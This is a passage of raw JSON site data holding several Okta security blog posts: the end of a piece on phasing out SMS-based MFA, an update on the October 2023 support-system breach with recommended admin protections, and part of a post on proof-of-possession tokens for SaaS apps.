(FTC) specifically \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://iapp.org/news/a/the-ftcs-rapidly-evolving-standards-for-mfa/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"prohibited a company\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" from using SMS-based MFA. And it’s not just in the United States. 
The UK’s National Cyber Security Centre (NCSC) recommends organizations to consider alternatives to SMS. “There are many ways by which SMS can be compromised and full defence against such attacks is not possible”. The Central Bank of Malaysia now \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.bnm.gov.my/-/financial-crime-exhibition-speech-en\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"requires banks\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" to make the same transition. Next door, Singapore’s Monetary Authority of Singapore (MAS) intends to “\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sg.finance.yahoo.com/news/sms-otp-mas-set-deadline-banks-phase-out-sole-authentication-factor-024151724.html?guccounter=1&guce_referrer=aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbS8&guce_referrer_sig=AQAAAJabatKOPTP5ITkmNL-pVh89mrlMdbVmAYHnJDaMbk5QtWPq6RWmsglGOH1W-6TSMmwverZsQcECVk__ZyC2NFzYgcBXj6gvJ2-y5qdChNfw-6pzPuekRro7kRZZHnv0YadqCu_vc6Z6B1MjFhLknkMyCXa28VGS0FiOmS8-uo2Z\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"set a deadline\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" for all retail banks to phase out the use of Short Messaging Service (SMS) one-time passwords (OTP) as a sole authentication factor for high-risk transactions.\\\" Which means, again \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.cisa.gov/sites/default/files/publications/fact-sheet-implementing-phishing-resistant-mfa-508c.pdf\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"per our pals at CISA\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", “phishing-resistant MFA is the gold standard and organizations should make migrating to it a high priority effort”.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"SMS and Shared 
Responsibility\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"At Okta, we are regularly impressed by the different ways our customers leverage identity to create value in their organizations. We also endeavor to make it easy for those customers to deliver the most secure and user-friendly authentication experience. Strong, user-friendly authentication is provided by Okta Verify as part of the Okta service, and meets most use cases. We offer a broad range of other authenticators to choose from too. Customers are free to choose SMS and voice for authentication, if the use case requires it and its use is within risk tolerance. That said, if your organization chooses to authenticate users via SMS, it’s important to perform your own due diligence on which SMS/telephony provider best meets your needs.\",\"marks\":[],\"data\":{}}]}]}"},"summary":null,"updatedAt":"2024-06-07T21:27:19.039Z","secAuthor":[{"id":"15f85411-1854-5e47-b48b-c00cd215bafd","bio":{"bio":"<p>Ben King is the Vice President for Security Trust and Culture at Okta. He leads the Field Security, Customer Assurance, Customer Audit, Security Communications and Culture teams operating across the Americas, Europe and APJ. Prior to joining Okta, Ben was in a regional cybersecurity leadership role for Symantec, and spent 11 years at the Commonwealth Bank of Australia in a variety of technology and cybersecurity strategy and governance roles, including as Cybersecurity lead for Europe. Ben has built a reputation for creating and leading high performing teams, having lived and worked in Australia, the United Kingdom, Canada and the USA. 
He holds a Bachelor of Engineering and a Bachelor of Commerce from the University of Sydney.</p><p> </p>"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/324uLkdOfj2XYPSpvXc8lH/2f6c417af2a3e3d074faac828bf8b9cf/ben-king-okta-trust.png"},"name":"Ben King","jobTitle":"VP, Security Trust & Culture","slug":"ben-king","node_locale":"en"}]},{"slug":"/october-security-incident-recommended-actions","id":"464babfd-2800-5528-b4e1-faa14338c428","title":"October Customer Support Security Incident - Update and Recommended Actions ","date":"2023-11-29T08:03:19+00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Related Posts: \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/articles/2023/11/unauthorized-access-oktas-support-case-management-system-root-cause\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Root Cause Analysis [RCA]\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" - Nov 3, 2023 / \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/articles/2023/10/tracking-unauthorized-access-oktas-support-system\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Security Incident\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" - Oct 20, 2023\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In the wake of the security incident Okta \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/articles/2023/10/tracking-unauthorized-access-oktas-support-system\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"disclosed\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" in October 2023 affecting our customer 
support management system (also known as the Okta Help Center), Okta Security has continued to review our initial analysis \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/articles/2023/11/unauthorized-access-oktas-support-case-management-system-root-cause\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"shared\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" on November 3, re-examining the actions that the threat actor performed. This included manually recreating reports the threat actor ran in the system and the files the threat actor downloaded.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Today we are sharing new information that potentially impacts the security of our customers.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We have determined that the threat actor ran and downloaded a report that contained the names and email addresses of all Okta customer support system users. All Okta Workforce Identity Cloud (WIC) and Customer Identity Solution (CIS) customers are impacted except customers in our FedRamp High and DoD IL4 environments (these environments use a separate support system NOT accessed by the threat actor). 
The Auth0/CIC support case management system was also not impacted by this incident.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The threat actor ran a report on September 28, 2023 at 15:06 UTC that contained the following fields for each user in Okta’s customer support system:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"table\",\"data\":{},\"content\":[{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Created Date\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Last Login\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Full Name\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Username\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Email\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Company Name\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"User 
Type\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Address\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"[Date of] Last Password Change or Reset\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Role: Name\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Role: Description\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Phone\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Mobile\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Time Zone\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"SAML Federation ID\",\"marks\":[],\"data\":{}}]}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The majority of the fields in the report are blank and the report does not include user credentials or sensitive personal data. 
For 99.6% of users in the report, the only contact information recorded is full name and email address.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"While we do not have direct knowledge or evidence that this information is being actively exploited, there is a possibility that the threat actor may use this information to target Okta customers via phishing or social engineering attacks. Okta customers sign in to Okta’s customer support system with the same accounts they use in their own Okta org. Many users of the customer support system are Okta administrators. It is critical that these users have multi-factor authentication (MFA) enrolled to protect not only the customer support system, but also to secure access to their Okta admin console(s).\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Given that names and email addresses were downloaded, we assess that there is an increased risk of phishing and social engineering attacks directed at these users. While 94% of Okta customers already require MFA for their administrators, we recommend ALL Okta customers employ MFA and consider the use of phishing-resistant authenticators to further enhance their security. 
Please refer to product documentation to enable MFA for the admin console (\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/en-us/content/topics/security/mfa/mfa-enable-admins.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Classic\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" or \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/content/topics/security/mfa/mfa-enable-admins.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"OIE\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\").\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"How we discovered this\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Following the publication of the RCA on November 3, Okta Security reviewed our initial analysis of the actions that the threat actor performed, including manually recreating the reports that the threat actor ran within the customer support system. We identified that the file size of one particular report downloaded by the threat actor was larger than the file generated during our initial investigation. After additional analysis, we concluded that the report contained a list of all customer support system users. The discrepancy in our initial analysis stems from the threat actor running an unfiltered view of the report. 
Our November review identified that if the filters were removed from the templated report, the downloaded file was considerably larger - and more closely matched the size of the file download logged in our security telemetry.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We also identified additional reports and support cases that the threat actor accessed, which contain contact information of all Okta certified users and some Okta Customer Identity Cloud (CIC) customer contacts, and other information. Some Okta employee information was also included in these reports. This contact information does not include user credentials or sensitive personal data.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We are working with a third-party digital forensics firm to validate our findings and we will be sharing the report with customers upon completion.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Implementing recommended best practices\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We recommend all customers immediately take the following actions to defend against potential attacks that target their Okta administrators.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Multi-Factor Authentication (MFA): We strongly recommend all Okta customers secure admin access using MFA at a minimum. 
We also strongly encourage customers to enroll administrative users in phishing resistant authenticators (such as Okta Verify FastPass, FIDO2 WebAuthn, or PIV/CAC Smart Cards) and to enforce phishing resistance for access to all administrative applications. Please refer to product documentation to enable MFA for the admin console (\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/en-us/content/topics/security/mfa/mfa-enable-admins.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Classic\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" or \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/content/topics/security/mfa/mfa-enable-admins.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"OIE\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\").\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Admin Session Binding: As communicated in the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/articles/2023/11/unauthorized-access-oktas-support-case-management-system-root-cause\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Security Incident RCA\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", customers can now enable an Early Access feature in Okta that requires admins to reauthenticate if their session is reused from an IP address with a different ASN (Autonomous System Number). 
Okta strongly recommends customers enable this feature to further secure admin sessions.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Admin Session Timeout: To align with \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://pages.nist.gov/800-63-4/sp800-63b.html\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"NIST AAL3\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" guidelines and increase the security posture of every customer, Okta is introducing Admin Console timeouts that will be set to a default of 12-hour session duration and a 15-minute idle time. Customers will have the option to edit these settings. This will be available as an Early Access feature starting November 29th for preview orgs and December 4th for production orgs. The feature will be available for all production orgs by January 8th, 2024. An email was sent to all Super Admins regarding this change on November 27th, and a copy of that communication can be found in the Knowledge Base article: \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://support.okta.com/help/s/article/admin-session-lifetime-idle-timeout-security-enhancements?language=en_US\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Admin Session Lifetime/Idle Timeout Security Enhancements\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Phishing Awareness: In addition, Okta customers should be vigilant of phishing attempts that target their employees and especially wary of social engineering attempts that target their IT Help Desks and related service providers. 
We recommend Okta customers implement our industry-leading, phishing-resistant methods for enrollment, authentication, and recovery. Please see \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/content/topics/architecture/pr/pr-overview.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Solutions for Phishing Resistance\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" for more information on protecting your organization from phishing. We also strongly recommend that customers review their IT Help Desk verification processes and ensure that appropriate checks, such as visual verification, are performed before performing high risk actions such as password or factor resets on privileged accounts.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}"},"summary":null,"updatedAt":"2024-06-07T20:58:03.276Z","secAuthor":[{"id":"87a8e5b7-da9e-56f7-95dc-37bd1aaee0d9","bio":{"bio":"<p>David Bradbury is Chief Security Officer at Okta. As CSO, he leads overall security execution for the organization and his team is responsible for navigating the evolving threat landscape to best protect employees and customers. In addition, he is instrumental in helping Okta’s customers continue to adopt and accelerate Zero Trust security strategies. </p>\n\n<p>Prior to joining Okta, Bradbury was Senior Vice President and Chief Security Officer at Symantec where he led and had global oversight of all cyber security and physical security programs. </p>\n\n<p>Bradbury has built an international reputation for leading and delivering cybersecurity at scale. He has worked across his native Australia, as well as in the United Kingdom and the United States, leading highly-regarded security teams at some of the world’s largest banks, including ABN AMRO, Barclays, Morgan Stanley and the Commonwealth Bank of Australia. 
He holds a B.S. in Computer Science from the University of Sydney.</p>"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/6TmzH9CPucdERKO5GNXf0y/9be194da88159d15d0faa88d84c5f70b/okta_062624_David_Bradbury_0819.jpg"},"name":"David Bradbury","jobTitle":"Chief Security Officer","slug":"david-bradbury","node_locale":"en"}]},{"slug":"/appsofthefuture","id":"92b98b26-b960-5b29-ae4a-459590cf7e01","title":"How to Secure the SaaS Apps of the Future","date":"2024-03-05T06:42:25+00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Over the past few years we’ve observed a fundamental shift in the threat model for highly targeted organizations.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Today, if an attacker can’t manage to steal user credentials for highly targeted organizations, they will pivot to instead stealing a user’s proof of authentication.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Attackers will use malware to steal session tokens from a user’s browser after they sign in. They may similarly use transparent proxies to steal session tokens from a user’s browser after they sign in. And as Okta’s recent experience shows, if bearer tokens of any kind are stored unprotected, attackers will sniff them out. Stolen session tokens can often be replayed in a browser of the attacker’s choosing for the remaining duration of the user session.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"For several years Okta has contributed to internet standards that aim to mitigate the theft and replay of session tokens. 
We are taking these actions because we cannot assume that the current solutions to these problems (endpoint protection and phishing resistant authentication) will always be applied effectively. It is prudent to assume that some malware will go undetected by endpoint protection solutions, or that some users will sign in to applications without the protection of phishing-resistant authenticators. When either of these events happen, defenders require an ability to limit the blast radius from a stolen session token.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Our goals here are threefold:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We need to constrain the use of tokens that are for specific devices, clients and/or locations,\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We need the identity ecosystem (identity providers and SaaS applications) to autonomously exchange signals about changes in session risk, and\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We need the means to act on identified changes in session risk: such as forcing step-up authentication within the context of an application, or signing a user out of all of their application sessions.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta has demonstrated, in response to an October security incident, that modern applications supporting OIDC (OpenID Connect) can meet many of these goals. 
Okta now binds Admin Sessions to location (ASN, by default and optionally by IP), forcing re-authentication when an administrative user changes location mid-session or attempts to perform critical, security-sensitive tasks.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The next challenge for Okta is to apply the same hardening techniques used for the Okta Admin Console to the innumerable third-party SaaS applications that our customers gate behind Okta.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We have laid the groundwork for several innovative new features that every enterprise SaaS application needs to embrace to protect users in the era of post-authentication attacks.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Enterprise-ready requirements for today’s SaaS apps\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Today there are a handful of non-negotiable requirements SaaS applications must meet before a Chief Security Officer (CSO) would consider them to be enterprise-ready.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Single Sign-On (via support for OIDC or SAML)\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"User Provisioning and deprovisioning (via support for SCIM)\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Programmatic access to logs (using 
REST APIs)\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"However, most CSOs haven’t updated the requirements they demand from SaaS applications for at least 5-10 years. And during that time, we have observed fundamental changes in both the nature of the applications we are protecting, and in the threat posed to SaaS applications from post-authentication attacks.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Enterprise-ready requirements for the Apps of the Future\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Today’s SaaS application is typically \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/blog/2020/06/the-path-to-continuous-authentication-solving-the-best-of-breed-problem/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"more than a simple web app\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\". For example, consider Slack. Slack is a distributed set of apps and services, encompassing both web and native application experiences, and integrated with other applications (e.g. Google Workspace, Atlassian Confluence and Jira) using OAuth. Securing these distributed applications requires a new, longer list of requirements. SaaS applications will (at the very least) need to support the three features detailed below to pass muster with CSOs.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"1. 
Proof-of-possession\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Proof-of-Possession is a method of constraining the use of OAuth access tokens to the client they were issued to (whether a browser-based or a native app).\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"It prevents attackers from replaying a stolen token from any other client; it does not, by itself, help when the attacker controls the authorized client (and therefore its signing key).\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta has addressed this requirement via our support for \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://developer.okta.com/docs/guides/dpop/main/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Demonstrating Proof-of-Possession\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", an OAuth 2.0 extension that developers of SaaS applications can use to cryptographically bind a token to an authorized client. If an access token issued to one client is intercepted by an attacker, and replayed on any other client, the SaaS application can deny access.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"There are a few logical reasons why this problem should be solved at the application level using DPoP. Previous efforts to solve this problem at the transport level (using mTLS-based token binding) have encountered \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://textslashplain.com/2023/10/23/protecting-auth-tokens/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"scale, deployability and usability challenges\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\". 
Trusted Platform Modules (TPMs) have historically not been fast enough to sign a proof for every HTTP request, and end-to-end proofs are also problematic in enterprise environments where proxies and other intermediaries terminate TLS.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"DPoP, by contrast, will reduce the risk of a stolen token across the broadest possible number of modern native apps. Okta has enabled DPoP by default in new \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://developer.okta.com/docs/guides/oin-api-service-overview/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"API Service Integrations\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" that access Okta’s management APIs. Once configured, Okta API endpoints will require the bearer of a token to prove this cryptographic relationship to an authorized client.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Chief Security Officers should be demanding that SaaS applications do the same. Consider the following requirement in your vendor security questionnaire:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"blockquote\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"SaaS applications must require cryptographic proof that a client presenting an access token is the client the token was issued to (demonstrating Proof-of-Possession).\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"2. 
